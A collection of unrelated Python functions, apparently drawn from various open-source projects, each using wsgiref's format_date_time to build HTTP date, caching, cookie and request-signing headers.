def s3_upload(bucket, filename, contents): from _sha1 import sha1 from base64 import b64encode import hmac import mimetypes import time from wsgiref.handlers import format_date_time mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' timestamp = time.time() date = format_date_time(timestamp) string_to_sign = '\n'.join(['PUT', '', mimetype, date, '/{}/{}'.format(bucket, filename)]) signature = hmac.new(config.AWS_ACCESS_KEY_SECRET.encode(), string_to_sign.encode(), sha1).digest() signature = b64encode(signature).decode() headers = { 'Authorization': 'AWS {}:{}'.format(config.AWS_ACCESS_KEY_ID, signature), 'Content-Length': len(contents), 'Content-Type': mimetype, 'Date': date, 'Expires': format_date_time(timestamp + 365 * 24 * 60 * 60), } conn = http.client.HTTPSConnection(bucket + '.s3.amazonaws.com') conn.request('PUT', '/' + filename, contents, headers) response = conn.getresponse() if response.status != 200: raise RuntimeError('s3 upload failed with {} {}: {}'.format(response.status, response.reason, response.read()))
def json_data_structure(self): return { 'name': self.name, 'description': self.description, 'date_modified': format_date_time(time.mktime(self.date_modified.timetuple())), 'date_created': format_date_time(time.mktime(self.date_created.timetuple())), }
def append_static_headers(response): now = datetime.now() stamp = mktime(now.timetuple()) response += WebServer.date_header + ' ' + format_date_time(stamp) + '\r\n' response += WebServer.content_type_header + ' text/html\r\n' response += WebServer.last_modified_header + ' ' + format_date_time(stamp) + '\r\n\r\n' return response
def get_headers(self, length): return [ ("Cache-Control", "public, max-age=3600"), ("Content-Length", str(length)), ("Content-Type", "application/json"), ("Expires", format_date_time(time() + 3600)), ("Last-Modified", format_date_time(time())), ]
def __call__(self): if self._last_mod_date and self._etag: items = feedparser.parse(self._url, etag=self._etag, modified=self._last_mod_date) elif self._last_mod_date: items = feedparser.parse(self._url, modified=self._last_mod_date) elif self._etag: items = feedparser.parse(self._url, etag=self._etag) else: items = feedparser.parse(self._url) try: etag = items.etag except AttributeError: etag = None mod_date = None try: mod_date = format_date_time(mktime(items.modified_parse)) except AttributeError: if not etag: mod_date = format_date_time(mktime(datetime.utcnow().timetuple())) for entry in items.entries: item = {} if mod_date: item['modified'] = mod_date if etag: item['etag'] = items.etag item['url'] = self._url item['title'] = entry.get('title', '') item['link'] = entry.get('link', '') item['summary'] = entry.get('summary', '') item['description'] = entry.get('description', '') item['content'] = entry.get('content', [{}]) #http://pythonhosted.org/feedparser/common-atom-elements.html #Atom entries can have more than one content element, # content is a list of dictionaries item['author'] = entry.get('author', '') item['guid'] = entry.get('guid', '') if 'published_parsed' in entry: item['date'] = datetime.fromtimestamp(mktime(entry['published_parsed'])).isoformat() else: item['date'] = datetime.utcnow().isoformat() item['made_up_date'] = True self._q.put(item, block=True) self._event.set()
def atoms(message, environ, response, transport, request_time): """Gets atoms for log formatting.""" if message: r = '{} {} HTTP/{}.{}'.format( message.method, message.path, message.version[0], message.version[1]) headers = message.headers else: r = '' headers = {} if transport is not None: remote_addr = parse_remote_addr( transport.get_extra_info('addr', '127.0.0.1')) else: remote_addr = ('',) atoms = { 'h': remote_addr[0], 'l': '-', 'u': '-', 't': format_date_time(None), 'r': r, 's': str(getattr(response, 'status', '')), 'b': str(getattr(response, 'output_length', '')), 'f': headers.get(hdrs.REFERER, '-'), 'a': headers.get(hdrs.USER_AGENT, '-'), 'T': str(int(request_time)), 'D': str(request_time).split('.', 1)[-1][:5], 'p': "<%s>" % os.getpid() } return atoms
def add_header(response): response.cache_control.max_age = 0 now = datetime.datetime.now() expires_time = now + datetime.timedelta(seconds=1) response.headers['Cache-Control'] = 'public' response.headers['Expires'] = format_date_time(time.mktime(expires_time.timetuple())) return response
def click_redirect(): destination = request.args['url'].encode('utf-8') fullname = request.args['id'].encode('utf-8') observed_mac = request.args['hash'] expected_hashable = ''.join((destination, fullname)) expected_mac = hmac.new( tracking_secret, expected_hashable, hashlib.sha1).hexdigest() if not constant_time_compare(expected_mac, observed_mac): abort(403) # fix encoding in the query string of the destination destination = urllib.unquote(destination) u = urlparse(destination) if u.query: query_dict = dict(parse_qsl(u.query)) # this effectively calls urllib.quote_plus on every query value query = urllib.urlencode(query_dict) destination = urlunparse( (u.scheme, u.netloc, u.path, u.params, query, u.fragment)) now = format_date_time(time.time()) response = redirect(destination) response.headers['Cache-control'] = 'no-cache' response.headers['Pragma'] = 'no-cache' response.headers['Date'] = now response.headers['Expires'] = now return response
def atoms(message, environ, response, transport, request_time): """Gets atoms for log formatting.""" if message: r = "{} {} HTTP/{}.{}".format(message.method, message.path, message.version[0], message.version[1]) headers = message.headers else: r = "" headers = {} if transport is not None: remote_addr = parse_remote_addr(transport.get_extra_info("addr", "127.0.0.1")) else: remote_addr = ("",) atoms = { "h": remote_addr[0], "l": "-", "u": "-", "t": format_date_time(None), "r": r, "s": str(getattr(response, "status", "")), "b": str(getattr(response, "output_length", "")), "f": headers.get(hdrs.REFERER, "-"), "a": headers.get(hdrs.USER_AGENT, "-"), "T": str(int(request_time)), "D": str(request_time).split(".", 1)[-1][:5], "p": "<%s>" % os.getpid(), } return atoms
def init(self, conf, env, num_entries=25): super(RssPerTag, self).init(conf, env) self.num_entries = num_entries env.engine.register( 'rfc822', lambda dt: unicode(format_date_time(total_seconds(dt - epoch)))) self.type = 'rss'
def get_headers(length): return [('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Methods', 'POST'), ('Content-Type', 'application/json'), ('Content-Length', str(length)), ('Cache-Control', 'no-cache'), ('Last-Modified', format_date_time(time()))]
def _add_default_headers(self): super()._add_default_headers() if hdrs.DATE not in self.headers: # format_date_time(None) is quite expensive self.headers.setdefault(hdrs.DATE, format_date_time(None)) self.headers.setdefault(hdrs.SERVER, self.SERVER_SOFTWARE)
def outbound(request, response, website): """Set caching headers for resources under assets/. """ uri = request.line.uri version = website.version response.headers['X-Gittip-Version'] = version if not uri.startswith('/assets/'): return response response.headers.cookie.clear() if response.code == 304: # https://github.com/gittip/www.gittip.com/issues/1308 if 'Content-Type' in response.headers: del response.headers['Content-Type'] return response if website.cache_static: # https://developers.google.com/speed/docs/best-practices/caching response.headers['Cache-Control'] = 'public' response.headers['Vary'] = 'accept-encoding' if 'version' in uri.path: # This specific asset is versioned, so it's fine to cache it. response.headers['Expires'] = 'Sun, 17 Jan 2038 19:14:07 GMT' else: # Asset is not versioned. Don't cache it, but set Last-Modified. last_modified = get_last_modified(request.fs) response.headers['Last-Modified'] = format_date_time(last_modified)
def lineReceived(self, line): # We pretend to support HTTP GET (even though logically, PUT or POST would be better) # Still, it is all in the URL for simplicity if line.startswith("GET"): self.receivedGET = True l = line.split(" ") if len(l) != 3: self.transport.loseConnection() return command = urllib.unquote(l[1][1:]) # Are we a somebody? self.imperio.receiveLine(command) now = datetime.now() stamp = mktime(now.timetuple()) data = "{sent:true}" headers = "HTTP/1.1 200 OK\r\n" headers += "Date: " + format_date_time(stamp) + "\r\n" headers += "Server: Firenze instance, probably on Dolores.\r\n" headers += "Content-Length: " + str(len(data)) + "\r\n" headers += "Content-Type: application/json\r\n\r\n" self.transport.write(headers) self.transport.write(data) self.transport.loseConnection()
def init(self, num_entries=25): from wsgiref.handlers import format_date_time from time import mktime self.num_entries = num_entries self.env.jinja2.filters['rfc822'] = lambda x: format_date_time(mktime(x.timetuple()))
def _output_if_modified(self, content): """ Check for ETag, then fall back to If-Modified-Since """ with TraceContext() as root: with root.span("CacheableHandler._output_if_modified"): modified = True # Normalize content try: content = str(content) except UnicodeEncodeError: content = unicode(content).encode('utf-8') etag = 'W/"{}"'.format(hashlib.md5(content).hexdigest()) # Weak ETag self.response.headers['ETag'] = etag if_none_match = self.request.headers.get('If-None-Match') if if_none_match and etag in [x.strip() for x in if_none_match.split(',')]: self.response.set_status(304) modified = False # Fall back to If-Modified-Since if modified and self._last_modified is not None: last_modified = format_date_time(mktime(self._last_modified.timetuple())) if_modified_since = self.request.headers.get('If-Modified-Since') self.response.headers['Last-Modified'] = last_modified if if_modified_since and if_modified_since == last_modified: self.response.set_status(304) modified = False if modified: self.response.out.write(content) return modified
def upload_data(self, payload): now = datetime.datetime.now() + datetime.timedelta(days=10) stamp = format_date_time(mktime(now.timetuple())) headers = {'Authorization':create_auth_header(self.oauth_parameters), 'X-TON-Expires':stamp} self.ton_url += '?' + urllib.urlencode(self.url_parameters) r = requests.post(self.ton_url, headers=headers, data=payload) return r.headers
def expiry_date(): from wsgiref.handlers import format_date_time from datetime import datetime, timedelta from time import mktime future_date = datetime.now() + timedelta(days=10 * 365) stamp = mktime(future_date.timetuple()) return format_date_time(stamp)
def outbound(request, response, website): """Set caching headers for resources under assets/. """ uri = request.line.uri if not uri.startswith('/assets/'): return response response.headers.cookie.clear() response.headers.pop('Vary') if response.code != 200: return response if website.cache_static: # https://developers.google.com/speed/docs/best-practices/caching response.headers['Cache-Control'] = 'public' response.headers['Vary'] = 'accept-encoding' # all assets are versioned, so it's fine to cache them response.headers['Expires'] = 'Sun, 17 Jan 2038 19:14:07 GMT' last_modified = get_last_modified(request.fs) response.headers['Last-Modified'] = format_date_time(last_modified)
def atoms(message, environ, response, request_time): """Gets atoms for log formatting.""" if message: r = '{} {} HTTP/{}.{}'.format( message.method, message.path, message.version[0], message.version[1]) else: r = '' atoms = { 'h': environ.get('REMOTE_ADDR', '-'), 'l': '-', 'u': '-', 't': format_date_time(None), 'r': r, 's': str(response.status), 'b': str(response.output_length), 'f': environ.get('HTTP_REFERER', '-'), 'a': environ.get('HTTP_USER_AGENT', '-'), 'T': str(int(request_time)), 'D': str(request_time).split('.', 1)[-1][:5], 'p': "<%s>" % os.getpid() } return atoms
def get(self): args = versioned_parser.parse_args() version = args.get('version') try: dataset = get_dataset(version) except ResourceError as e: return e.response() context_etag = 'periodo-context-version-{}'.format(dataset['id']) if request.if_none_match.contains_weak(context_etag): return None, 304 headers = {} headers['Last-Modified'] = format_date_time(dataset['created_at']) context = json.loads(dataset['data']).get('@context') if context is None: return None, 404 response = api.make_response({'@context': context}, 200, headers) response.set_etag(context_etag, weak=True) if version is None: return cache.no_time(response) else: return cache.long_time(response)
def cookie(self, k, v, expires=None, domain=None, path='/', secure=False): """ Sets cookie value. :param k: Name for cookie value :param v: Cookie value :param expires: Cookie expiration date :param domain: Cookie domain :param path: Cookie path :param secure: Flag for `https only` :type k: str :type v: str :type expires: datetime.datetime :type domain: str :type path: str :type secure: bool """ ls = ['{}={}'.format(k, v)] if expires is not None: dt = format_date_time(mktime(expires.timetuple())) ls.append('expires={}'.format(dt)) if domain is not None: ls.append('domain={}'.format(domain)) if path is not None: ls.append('path={}'.format(path)) if secure: ls.append('secure') return self.header('Set-Cookie', '; '.join(ls), False)
def get(self): args = versioned_parser.parse_args() version = args.get('version') filename = 'periodo-dataset{}'.format( '' if version is None else '-v{}'.format(version)) try: dataset = get_dataset(version) except ResourceError as e: return e.response() dataset_etag = 'periodo-dataset-version-{}'.format(dataset['id']) if request.if_none_match.contains_weak(dataset_etag): return None, 304 headers = {} headers['Last-Modified'] = format_date_time(dataset['created_at']) data = json.loads(dataset['data']) if version is not None and '@context' in data: data['@context']['__version'] = version if 'inline-context' in request.args: data['@context']['__inline'] = True response = api.make_response( attach_to_dataset(data), 200, headers, filename=filename) response.set_etag(dataset_etag, weak=True) if version is None: return cache.short_time(response, server_only=True) else: return cache.long_time(response)
def get(self): args = dataset_parser.parse_args() dataset = database.get_dataset(args.get('version', None)) if not dataset: if args['version']: return {'status': 404, 'message': 'Could not find given version.'}, 404 else: return {'status': 501, 'message': 'No dataset loaded yet.'}, 501 requested_etag = args.get('etag') dataset_etag = 'periodo-dataset-version-{}'.format(dataset['id']) if requested_etag == dataset_etag: return None, 304 headers = {} headers['Last-Modified'] = format_date_time(dataset['created_at']) if not args['version']: headers['Cache-control'] = 'public, max-age=0' else: headers['Cache-control'] = 'public, max-age=604800' response = api.make_response( attach_to_dataset(json.loads(dataset['data'])), 200, headers) response.set_etag(dataset_etag, weak=True) return response
def operation_report_result_set(self, req, args): """ Run a report, generating a result set. """ dbconn = self._connect_db() table_name = args['report'] del args['report'] server_modified = DBQueries.get_table_lastupdate(dbconn, table_name) headers = [( 'Last-Modified', format_date_time(mktime(server_modified.timetuple())) )] # Handle conditional requests if not args: if ( req.if_modified_since and req.if_modified_since >= server_modified ): return (webob.exc.HTTPNotModified(), headers) try: result_set = DBQueries.filter_table(dbconn, table_name, args) # Pylint warns about catch-all exception handlers like that below. # The rationale is that this "prohibits the use of tailored # responses" - but that is exactly what we are attempting to do. # So just disable the warning. # pylint: disable=W0702 except: # Don't leak information about the database return (webob.exc.HTTPBadRequest(), []) return (result_set, headers)
def get(self, request, path): if self.path: parent_url = request.build_absolute_uri(reverse('browse:index', kwargs={'path': ''.join(p + '/' for p in path.split('/')[:-2])})) else: parent_url = None subpaths, sort_name, sort_reverse = self.get_subpath_data(request, path) stat = os.stat(self.path_on_disk) context = { 'path': self.path, 'message': request.GET.get('message'), 'parent_url': parent_url, 'subpaths': subpaths, 'stat': statinfo_to_dict(stat), 'additional_headers': { 'Last-Modified': format_date_time(stat.st_mtime), }, 'sort_name': sort_name, 'sort_reverse': sort_reverse, 'column_names': (('name', 'Name'), ('modified', 'Last modified'), ('size', 'Size'), ('owner_name', 'Owner')), 'dataset_submissions': DatasetSubmission.objects.filter(path_on_disk=self.path_on_disk), } return self.render(request, context, 'browse/directory')
def outbound(response): """Set caching headers for resources under assets/. """ request = response.request website = request.website uri = request.line.uri version = website.version response.headers["X-Gittip-Version"] = version if not uri.startswith("/assets/"): return response response.headers.cookie.clear() if response.code == 304: # https://github.com/gittip/www.gittip.com/issues/1308 del response.headers["Content-Type"] return response if website.cache_static: # https://developers.google.com/speed/docs/best-practices/caching response.headers["Cache-Control"] = "public" response.headers["Vary"] = "accept-encoding" if "version" in uri.path: # This specific asset is versioned, so it's fine to cache it. response.headers["Expires"] = "Sun, 17 Jan 2038 19:14:07 GMT" else: # Asset is not versioned. Don't cache it, but set Last-Modified. last_modified = get_last_modified(request.fs) response.headers["Last-Modified"] = format_date_time(last_modified)
def get(self, uuid): args = versioned_parser.parse_args() version = args.get('version') bag = database.get_bag(uuid, version=version) if not bag: abort(404) bag_etag = 'bag-{}-version-{}'.format(uuid, bag['version']) if request.if_none_match.contains_weak(bag_etag): return None, 304 headers = {} headers['Last-Modified'] = format_date_time(bag['created_at']) data = json.loads(bag['data']) defs, defs_ctx = database.get_periods_and_context(data['items']) data['@id'] = identifier.prefix('bags/%s' % uuid) data['creator'] = bag['created_by'] data['items'] = defs response = api.make_response(data, 200, headers) response.set_etag(bag_etag, weak=True) if version is None: return cache.no_time(response) else: return cache.long_time(response)
def get(self, id): data = get_graphs(prefix=id) filename = 'periodo-graph-{}'.format(id.replace('/', '-')) if len(data['graphs']) > 0: return cache.medium_time( api.make_response(data, 200, filename=filename)) args = versioned_parser.parse_args() version = args.get('version') graph = database.get_graph(id, version=version) filename += ('' if version is None else '-v{}'.format(version)) if not graph: abort(404) graph_etag = 'graph-{}-version-{}'.format(id, graph['version']) if request.if_none_match.contains_weak(graph_etag): return None, 304 headers = {} headers['Last-Modified'] = format_date_time(graph['created_at']) data = json.loads(graph['data']) response = api.make_response(data, 200, headers, filename=filename) response.set_etag(graph_etag, weak=True) if version is None: return cache.medium_time(response) else: return cache.long_time(response)
def _start_response(self, status, response_headers, exc_info=None): server_headers = [ ('Date', str(format_date_time(time()))), ('Server', 'WSGIServer 0.2'), ] self.headers_set = [status, response_headers + server_headers]
def read(uid): """show a blog entry""" blog_entry = db.session.query(BlogEntry).filter_by(uid = uid).first() if not blog_entry: abort(404) etag = '"{0}"'.format(hashlib.sha256(str(blog_entry.updated)).hexdigest()) if request.headers.get('If-None-Match', '') == etag: return '', 304 last_modified = format_date_time(mktime(blog_entry.updated.timetuple())) if request.headers.get('If-Modified-Since', '') == last_modified: return '', 304 response = make_response(render_template('blog_entry/read.html', blog_entry = blog_entry, disqus_shortname = DISQUS_SHORTNAME)) response.headers['ETag'] = etag response.headers['Last-Modified'] = last_modified return response
def cache_func(*args, **kwargs): resp, code, headers = unpack(view(*args, **kwargs)) now = datetime.datetime.now() headers['Last-Modified'] = format_date_time(time.mktime(now.timetuple())) failure = code - 200 >= 100 # this is not a successful answer do_not_cache = getattr(g, 'DONOTCACHE', False) if expires is None or failure or do_not_cache: headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0' else: headers['Cache-Control'] = 'private, max-age={}'.format(expires) return resp, code, headers
def _update_storage_table_header(request, content_type='application/atom+xml'): ''' add additional headers for storage table request. ''' request = _update_storage_header(request) if content_type: for name, _ in request.headers: if name.lower() == 'content-type': break else: request.headers.append(('Content-Type', content_type)) request.headers.append(('DataServiceVersion', '2.0;NetFx')) request.headers.append(('MaxDataServiceVersion', '2.0;NetFx')) current_time = format_date_time(time()) request.headers.append(('x-ms-date', current_time)) request.headers.append(('Date', current_time)) return request.headers
def api_call(method, uri, data, timeout): """ API call """ # ESP API endpoint - http://api-docs.evident.io/ url = 'https://api.evident.io' # Uses the RFC-1123 spec. Note: Must be in the GMT timezone. now = datetime.now() stamp = mktime(now.timetuple()) dated = format_date_time(stamp) # The Content-MD5 header should include a MD5 base64 hexdigest of the request body. hex = hashlib.md5(data.encode('UTF-8')).hexdigest() body = codecs.encode(codecs.decode(hex, 'hex'), 'base64').decode().rstrip('\n') # Create a canonical string using your HTTP headers containing the HTTP method, # content-type, content-MD5, request URI and the timestamp. canonical = '%s,%s,%s,%s,%s' % (method, 'application/vnd.api+json', body, uri, dated) # Convert from string to bytes. secret = bytes(secret_key, 'UTF-8') canonical = bytes(canonical, 'UTF-8') # Use the HMAC-SHA1 algorithm to encode the string with your secret key. hashed = hmac.new(secret, canonical, hashlib.sha1) encoded = base64.b64encode(hashed.digest()) auth = str(encoded, 'UTF-8') # Add an Authorization header with the ‘APIAuth’, the public key, and the encoded # canonical string. headers = { 'Date' : '%s' % (dated), 'Content-MD5' : '%s' % (body), 'Content-Type' : 'application/vnd.api+json', 'Accept' : 'application/vnd.api+json', 'Authorization' : 'APIAuth %s:%s' % (pub_key, auth) } # Using requests # http://docs.python-requests.org/en/latest/user/advanced/ r = requests.Request(method, url+uri, data=data, headers=headers) p = r.prepare() s = requests.Session() ask = s.send(p, timeout=timeout) response = ask.json() return response
def __init__(self, APPID, APIKey, APISecret, AudioFile, language): self.APPID = APPID self.APIKey = APIKey self.APISecret = APISecret self.AudioFile = AudioFile self.CommonArgs = {"app_id": self.APPID} self.BusinessArgs = { "language": language, "domain": "iat", # iat(日常用语), medical(医疗领域) "accent": "mandarin" } # 接口鉴权 self.signature = {"host": None, "date": None, "authorization": None} # host if language == "zh_cn" or language == "en_us": self.url = "wss://iat-api.xfyun.cn/v2/iat" self.signature["host"] = "ws-api.xfyun.cn" else: self.url = "wss://iat-niche-api.xfyun.cn/v2/iat" self.signature["host"] = "iat-niche-api.xfyun.cn" # date, RFC1123-formatted now = datetime.datetime.now() date = format_date_time(mktime(now.timetuple())) self.signature["date"] = date # authorizaiton, base64-encoded signature_origin = "host: " + self.signature["host"] + "\n" signature_origin += "date: " + self.signature["date"] + "\n" signature_origin += "GET " + "/v2/iat " + "HTTP/1.1" signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'), digestmod=hashlib.sha256).digest() signature_sha = base64.b64encode(signature_sha).decode( encoding='utf-8') authorizaiton_origin = 'api_key="{}",'.format(self.APIKey) \ + 'algorithm="hmac-sha256",' \ + 'headers="host date request-line",' \ + 'signature="{}"'.format(signature_sha) authorization = base64.b64encode( authorizaiton_origin.encode('utf-8')).decode(encoding='utf-8') self.signature["authorization"] = authorization self.url += '?' self.url += urlencode(self.signature)
def get_auth_header(self): xdate = format_date_time(mktime(datetime.now().timetuple())) hashed = hmac.new(self.app_key.encode('utf8'), ('x-date: ' + xdate).encode('utf8'), sha1) signature = base64.b64encode(hashed.digest()).decode() authorization = 'hmac username="******", ' + \ 'algorithm="hmac-sha1", ' + \ 'headers="x-date", ' + \ 'signature="' + signature + '"'
def _make_api_request(method, endpoint, *args, **kwargs): func = getattr(requests, method) # Adding 'date' header as per # https://github.com/zzsnzmn/py-http-signature/blob/e2e2c753db7da45fab4b215d84e8d490bd708833/http_signature/sign.py#L155 # noqa headers = { 'date': format_date_time(mktime(datetime.now().timetuple())), 'X-Api-Version': '~6.5', 'X-Api-Key': settings.ORCHESTRA_PROJECT_API_KEY } headers.update(kwargs.pop('headers', {})) all_kwargs = {'auth': _httpsig_auth, 'headers': headers} all_kwargs.update(kwargs) url = '{}{}/'.format(_api_root_url, endpoint) response = func(url, *args, **all_kwargs) if response.status_code != 200: raise OrchestraError(response.text) return response
def wsgi_environ(self): # return a the WSGI environ dictionary transport = self.transport https = True if is_tls(transport.get_extra_info('socket')) else False multiprocess = (self.cfg.concurrency == 'process') environ = wsgi_environ(self._stream, transport.get_extra_info('sockname'), self.address, self.headers, self.SERVER_SOFTWARE, https=https, extra={'pulsar.connection': self.connection, 'pulsar.cfg': self.cfg, 'wsgi.multiprocess': multiprocess}) self.keep_alive = keep_alive(self.headers, self.parser.get_version()) self.headers.update([('Server', self.SERVER_SOFTWARE), ('Date', format_date_time(time.time()))]) return environ
def read(title): """show a page""" page = db.session.query(Page).filter( func.lower(Page.title) == title.lower()).first() if not page: abort(404) etag = '"{0}"'.format(hashlib.sha256(str(page.updated)).hexdigest()) if request.headers.get('If-None-Match', '') == etag: return '', 304 last_modified = format_date_time(mktime(page.updated.timetuple())) if request.headers.get('If-Modified-Since', '') == last_modified: return '', 304 response = make_response(render_template('page/read.html', page=page)) response.headers['ETag'] = etag response.headers['Last-Modified'] = last_modified return response
def __init__(self, document, thumbnail=False): if thumbnail: content, content_type, filename = self.retieve_thumbnail(document) else: content, content_type, filename = self.retrieve_file(document) super(DMSObjectResponse, self).__init__(content=content, content_type=content_type) if content is not None: self["Content-Length"] = len(content) if thumbnail: self["Content-Type"] = content_type # Cache thumbnails for 1 day now = datetime.now() exp = now + timedelta(days=1) stamp = mktime(exp.timetuple()) expires = format_date_time(stamp) self['Expires'] = expires self["Content-Disposition"] = 'filename=%s' % filename
def create_header(full_path): mtype = mimetypes.MimeTypes().guess_type(full_path) var5 = open(full_path, 'rb') var6 = var5.read() h1 = 'HTTP/1.1 200 OK' + '\n' h2 = 'Date:' + str(format_date_time(time.time())) + '\n' h3 = 'Server: Apache' + '\n' var7 = os.stat(full_path) var8 = var7.st_mtime var9 = datetime.datetime.fromtimestamp(var8).strftime('%a, %d %b %Y %H:%M:%S GMT') var10 = os.path.getsize(full_path) h4 = 'Last-Modified: ' + str(var9) + '\n' h5 = 'Content-Length: ' + str(var10) + '\n' h6 = 'Content-Type: ' + str(mtype) + '\n' h7 = 'Connection: close' + '\n' h8 = '\r\n' header = ''.join((h1, h2, h3, h4, h5, h6, h7, h8)) return header
def response_headers(self, protocol: str) -> List[Tuple[bytes, bytes]]: headers = [] if self.include_date_header: headers.append((b"date", format_date_time(time()).encode("ascii"))) if self.include_server_header: headers.append((b"server", f"hypercorn-{protocol}".encode("ascii"))) for alt_svc_header in self.alt_svc_headers: headers.append((b"alt-svc", alt_svc_header.encode())) if len(self.alt_svc_headers) == 0 and self._quic_addresses: from aioquic.h3.connection import H3_ALPN for version in H3_ALPN: for addr in self._quic_addresses: port = addr[1] headers.append((b"alt-svc", b'%s=":%d"; ma=3600' % (version.encode(), port))) return headers
def rest(self, base_url): """ Return a Python object representing this model""" m = {} m["sid"] = self.sid() stamp = mktime(self.start.timetuple()) m["timestamp"] = format_date_time(stamp) m["status"] = self.status.rest(base_url) m["message"] = unicode(self.message) m["url"] = base_url + self.resource_url() if self.informational: m["informational"] = self.informational else: m["informational"] = False return m
def _send_http_response_with_body( self, status_code, body, ): data = self.http_parser.send( h11.Response( status_code=status_code, headers=[ ("Date", format_date_time(None).encode("ascii")), ("Server", b"whatever"), ('Content-Length', str(len(body))), ('Connection', b'close'), ], )) body_data = self.http_parser.send(h11.Data(data=body)) self.transport.write(data) self.transport.write(body_data)
def __init__(self, status_code, status_message, version=None, connection=None, content_length=None, content_type=None, date=format_date_time(mktime(datetime.now().timetuple())), body=None, content_encoding=None): super().__init__(connection=connection, version=version) self.status_code = status_code self.status_msg = status_message self.content_len = content_length self.content_type = content_type self.date = date self.body = body self.content_encoding = content_encoding
def check_conditional_requests(req, content): method = req[0][0] last_modified = str(format_date_time(os.stat(content).st_mtime)) etag = e_tag.gen_etag(content) if_dict = get_if_dict(req) sc = 200 if "if-match" in if_dict: sc = check_match(if_dict, etag, method) elif "if-unmodified-since" in if_dict: sc = check_unmodified(if_dict, last_modified, etag, method) elif "if-none-match" not in if_dict: if "if-modified-since" in if_dict: sc = check_modified(method, if_dict, last_modified) return sc
def test_headers(self): # First, test cases where the response should be private and # not cached. These are the kinds of settings used for error # messages. def assert_not_cached(max_age): headers = Response(max_age=max_age).headers eq_("private, no-cache", headers['Cache-Control']) assert 'Expires' not in headers assert_not_cached(max_age=None) assert_not_cached(max_age=0) assert_not_cached(max_age="Not a number") # Test the case where the response is public but should not be cached. headers = Response(max_age=0, private=False).headers eq_("public, no-cache", headers['Cache-Control']) # Test the case where the response _should_ be cached. max_age = 60 * 60 * 24 * 12 obj = Response(max_age=max_age) headers = obj.headers cc = headers['Cache-Control'] eq_(cc, 'public, no-transform, max-age=1036800, s-maxage=518400') # We expect the Expires header to look basically like this. expect_expires = (datetime.datetime.utcnow() + datetime.timedelta(seconds=max_age)) expect_expires_string = format_date_time( time.mktime(expect_expires.timetuple())) # We'll only check the date part of the Expires header, to # minimize the changes of spurious failures based on # unfortunate timing. expires = headers['Expires'] eq_(expires[:17], expect_expires_string[:17]) # It's possible to have a response that is private but should # be cached. The feed of a patron's current loans is a good # example. response = Response(max_age=30, private=True) cache_control = response.headers['Cache-Control'] assert 'private' in cache_control assert 'max-age=30' in cache_control
def click_redirect(): destination = urllib.unquote(request.args['url'].encode('utf-8')) fullname = request.args['id'].encode('utf-8') observed_mac = request.args['hash'] expected_hashable = ''.join((destination, fullname)) expected_mac = hmac.new( tracking_secret, expected_hashable, hashlib.sha1).hexdigest() if not constant_time_compare(expected_mac, observed_mac): abort(403) now = format_date_time(time.time()) response = redirect(destination) response.headers['Cache-control'] = 'no-cache' response.headers['Pragma'] = 'no-cache' response.headers['Date'] = now response.headers['Expires'] = now return response
def get_cookie_header(self, cookie: Cookie) -> str: buf = "" buf += cookie.get_name() + "=" if cookie.get_value() is None: buf += "" else: buf += cookie.get_value() if cookie.get_path(): buf += "; Path=" + cookie.get_path() if cookie.get_domain(): buf += "; Domain=" + cookie.get_domain() maxAge = cookie.get_max_age() if maxAge >= 0: buf += "; Max-Age=" + str(maxAge) buf += "; Expires=" if isinstance(cookie, MockCookie): expires = cookie.get_expires() else: expires = None if expires is not None: stamp = mktime(expires.timetuple()) buf += format_date_time(stamp) else: headers = HttpHeaders() if maxAge > 0: headers.setExpires( int(round(time.time() * 1000)) + 1000 * maxAge ) else: headers.setExpires(0) buf += headers.getFirst(HttpHeaders.EXPIRES) if cookie.get_secure(): buf += "; Secure" if cookie.is_http_only(): buf += "; HttpOnly" if isinstance(cookie, MockCookie): if cookie.getSameSite(): buf += "; SameSite=" + cookie.getSameSite() return buf
def get_accept_header(self, media_type, version): hs = httpsig.HeaderSigner( self.remote_site.identifier, self.get_private_key(), algorithm="rsa-sha256", headers=["date", "x-beacon-user"], ) header = { "X-Beacon-User": "******", "Date": format_date_time(self.get_date().timestamp()), } entrypoint_url = urllib.parse.urlsplit(self.remote_site.entrypoint_url) signed_headers_dict = hs.sign(header, method="GET", path=entrypoint_url.path) return { _header_canonical(k): v for k, v in signed_headers_dict.items() }
def click_redirect(): ip = request.environ['REMOTE_ADDR'] destination = request.args['url'].encode('utf-8') fullname = request.args['id'] observed_hash = request.args['hash'] expected_hash_text = ''.join((ip, fullname, tracking_secret)) expected_hash = hashlib.sha1(expected_hash_text).hexdigest() if expected_hash != observed_hash: abort(403) now = format_date_time(time.time()) response = redirect(destination) response.headers['Cache-control'] = 'no-cache' response.headers['Pragma'] = 'no-cache' response.headers['Date'] = now response.headers['Expires'] = now return response
def file_set_content(self, content, last_modified=None, hash_spec=None): assert isinstance(content, bytes) if last_modified != -1: if last_modified is None: last_modified = unicode_if_bytes(format_date_time(None)) self.last_modified = last_modified if hash_spec: err = get_checksum_error(content, hash_spec) if err: raise ValueError(err) else: hash_spec = get_default_hash_spec(content) self.hash_spec = hash_spec self.tx.conn.io_file_set(self._storepath, content) # we make sure we always refresh the meta information # when we set the file content. Otherwise we might # end up only committing file content without any keys # changed which will not replay correctly at a replica. self.key.set(self.meta)
def apply_hmac_auth(http_request, url, body=None): """ Add hmac authentication to the request. Args: http_request (HttpRequest): The HttpRequest object to which authentication will be added. url (str): The url of the request. body (str): The body of the request. None for GET requests. """ username = Configuration.hmac_auth_user_name content_signature = "" content_header = "" now = datetime.now() stamp = mktime(now.timetuple()) date_header = format_date_time(stamp) request_type = "GET" if body is not None: request_type = "POST" m = hashlib.md5() content_hash = m.hexdigest() content_signature = "x-Content-MD5: {}\n".format(content_hash) content_header = "x-Content-MD5 " http_request.headers["x-Content-MD5"] = content_hash http_request.headers["date"] = date_header hmac_signature = AuthManager.create_signature(date_header, content_signature, url, request_type) joined = 'username="******", algorithm="hmac-sha1", headers="date {}'\ 'request-line", signature="{}"'\ .format(username, content_header, hmac_signature) header_value = "hmac {}".format(joined) http_request.headers["Authorization"] = header_value
